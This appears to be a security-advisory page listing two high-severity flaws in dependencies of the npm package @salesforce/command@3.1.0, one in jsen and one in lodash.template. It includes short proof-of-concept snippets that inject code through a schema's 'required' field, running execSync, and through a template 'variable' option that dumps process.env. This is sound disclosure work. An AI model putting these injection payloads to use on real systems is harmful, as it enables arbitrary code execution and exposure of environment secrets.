@salesforce/command@3.1.0

Vulnerabilities

2 via 4 paths

Dependencies

226

Source

npm

high severity

Arbitrary Code Execution

  • Vulnerable module: jsen
  • Introduced through: @salesforce/core@2.24.0

Detailed paths

  • Introduced through: @salesforce/command@3.1.0 @salesforce/core@2.24.0 jsen@0.6.6

Overview

jsen is a JSON-Schema validator built for speed.

Affected versions of this package are vulnerable to Arbitrary Code Execution. If an attacker can control the schema file, they could run arbitrary JavaScript code on the victim machine. In the module description and README file there is no mention of the risks of untrusted schema files, so I assume that this is applicable.

In particular, the required field of the schema is not properly sanitized. The string that is built from the schema definition is then passed to Function.apply(), leading to arbitrary code execution.

PoC

const jsen = require('jsen');

let schema = JSON.parse(`
{
    "type": "object",
    "properties": {
        "username": {
            "type": "string"
        }
    },
    "required": ["\\"+process.mainModule.require(\'child_process\').execSync(\'touch malicious\')+\\""]
}`);

const validate = jsen(schema);
validate({});

Remediation

There is no fixed version for jsen.

high severity

Command Injection

  • Vulnerable module: lodash.template
  • Introduced through: @oclif/plugin-help@2.2.3 and @oclif/command@1.8.0

Detailed paths

  • Introduced through: @salesforce/command@3.1.0 @oclif/plugin-help@2.2.3 lodash.template@4.5.0
  • Introduced through: @salesforce/command@3.1.0 @oclif/command@1.8.0 @oclif/plugin-help@3.2.2 lodash.template@4.5.0
  • Introduced through: @salesforce/command@3.1.0 @oclif/plugin-help@2.2.3 @oclif/command@1.8.0 @oclif/plugin-help@3.2.2 lodash.template@4.5.0

Overview

lodash.template is the Lodash method _.template exported as a Node.js module.

Affected versions of this package are vulnerable to Command Injection via template.

PoC

var _ = require('lodash');

_.template('', { variable: '){console.log(process.env)}; with(obj' })()

Remediation

There is no fixed version for lodash.template.